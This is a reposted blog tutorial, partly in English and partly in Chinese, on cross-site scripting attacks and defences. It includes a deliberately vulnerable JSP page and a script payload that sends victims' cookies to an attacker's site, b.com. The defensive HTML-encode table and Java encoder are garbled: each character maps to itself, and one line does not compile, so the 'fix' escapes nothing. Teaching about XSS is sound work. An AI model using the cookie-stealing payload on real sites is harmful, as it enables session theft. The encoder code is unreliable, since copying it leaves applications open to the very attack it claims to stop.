Repost address: http://blog.csdn.net/ghsau/article/details/17027893
This article comes from: Gao Shuang|Coder , the original address: http://blog.csdn.net/ghsau/article/details/17027893 , please indicate when reprinting.
XSS, also known as CSS, the full name of Cross SiteScript, cross-site scripting attack, is a common vulnerability in Web programs. XSS is a passive and client-side attack method, so its harmfulness is easily ignored. The principle is that an attacker enters (passes in) malicious HTML code into a website with XSS vulnerabilities. When other users browse the website, this HTML code will be automatically executed, thereby achieving the purpose of the attack. For example, stealing user cookies, destroying page structure, redirecting to other websites, etc.
XSS attack
XSS attacks are similar to SQL injection attacks. Before attacking, we first find a website with XSS vulnerabilities. There are two types of XSS vulnerabilities, one is DOM Based XSS vulnerability, and the other is Stored XSS vulnerability. In theory, if the input data is not processed in all input places , there will be XSS vulnerabilities. The harm of the vulnerabilities depends on the power of the attack code, and the attack code is not limited to scripts.
DOM Based XSS
DOM Based XSS is an attack based on the DOM structure of a web page. The attack is characterized by a small number of people being attacked.
Scenario one :
When I log in to a.com, I find that some content of its page is directly displayed according to a parameter called content in the url. I guess it may be like this for testing the page processing, and other languages are similar:
| <%@ page language="Java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPEhtmlPUBLIC"-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head> < title > XSS test </ title > </head> <body> Page content: <%= request.getParameter( "content" ) %> </body> </html> |
I know that Tom has also registered the website, and I know his email address (or other contact information that can receive information), I make a hyperlink and send it to him, the hyperlink address is: http://www.a.com ?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>, when Tom clicks this link (assuming he is logged in to a.com), the browser will Will open b.com directly, and send Tom's cookie information in a.com to b.com, b.com is the website I built, when my website receives the information, I stole Tom's cookie in a.com The cookie information of a.com, the login password may be stored in the cookie information, the attack is successful! In the process, the only victim was Tom himself. Then when I enter a.com?content=<script>alert("xss")</script> in the browser, and the browser displays the page content, my script will be executed, and the page will output the word xss, which is I attacked myself, so how can I attack others and profit?
Stored XSS
Stored XSS is a stored XSS vulnerability. Since its attack code has been stored on the server or in the database , the victims are many people.
Scenario two :
a.com可以发文章,我登录后在a.com中发布了一篇文章,文章中包含了恶意代码,<script>window.open(“www.b.com?param=”+document.cookie)</script>,保存文章。这时Tom和Jack看到了我发布的文章,当在查看我的文章时就都中招了,他们的cookie信息都发送到了我的服务器上,攻击成功!这个过程中,受害者是多个人。
Stored XSS漏洞危害性更大,危害面更广。
XSS防御
我们是在一个矛盾的世界中,有矛就有盾。只要我们的代码中不存在漏洞,攻击者就无从下手,我们要做一个没有缝的蛋。XSS防御有如下方式。
完善的过滤体系
永远不相信用户的输入。需要对用户的输入进行处理,只允许输入合法的值,其它值一概过滤掉。
Html encode
假如某些情况下,我们不能对用户数据进行严格的过滤,那我们也需要对标签进行转换。
| less-than character (<) |
< |
| greater-than character (>) |
> |
| ampersand character (&) |
& |
| double-quote character (") |
" |
| space character( ) |
|
| Any ASCII code character whose code is greater-than or equal to 0x80 |
&#<number>, where <number> is the ASCII character value. |
比如用户输入:<script>window.location.href=”http://www.baidu.com”;</script>,保存后最终存储的会是:<script>window.location.href="http://www.baidu.com"</script>在展现时浏览器会对这些字符转换成文本内容显示,而不是一段可执行的代码。
其它
- 使用Apache的commons-lang.jar
StringEscapeUtils.escapeHtml(str);// 汉字会转换成对应的ASCII码,空格不转换
- 自己实现转换,只转换部分字符
private static String htmlEncode(char c) {
switch(c) {
case '&':
return "&";
case '<':
return "<";
case '>':
return ">";
case '"':
return """;
case ' ':
return " ";
default:
return c + "";
}
}
/** 对传入的字符串str进行Html encode转换 */
public static String htmlEncode(String str) {
if (str ==null || str.trim().equals("")) return str;
StringBuilder encodeStrBuilder = new StringBuilder();
for (int i = 0, len = str.length(); i < len; i++) {
encodeStrBuilder.append(htmlEncode(str.charAt(i)));
}
return encodeStrBuilder.toString();
}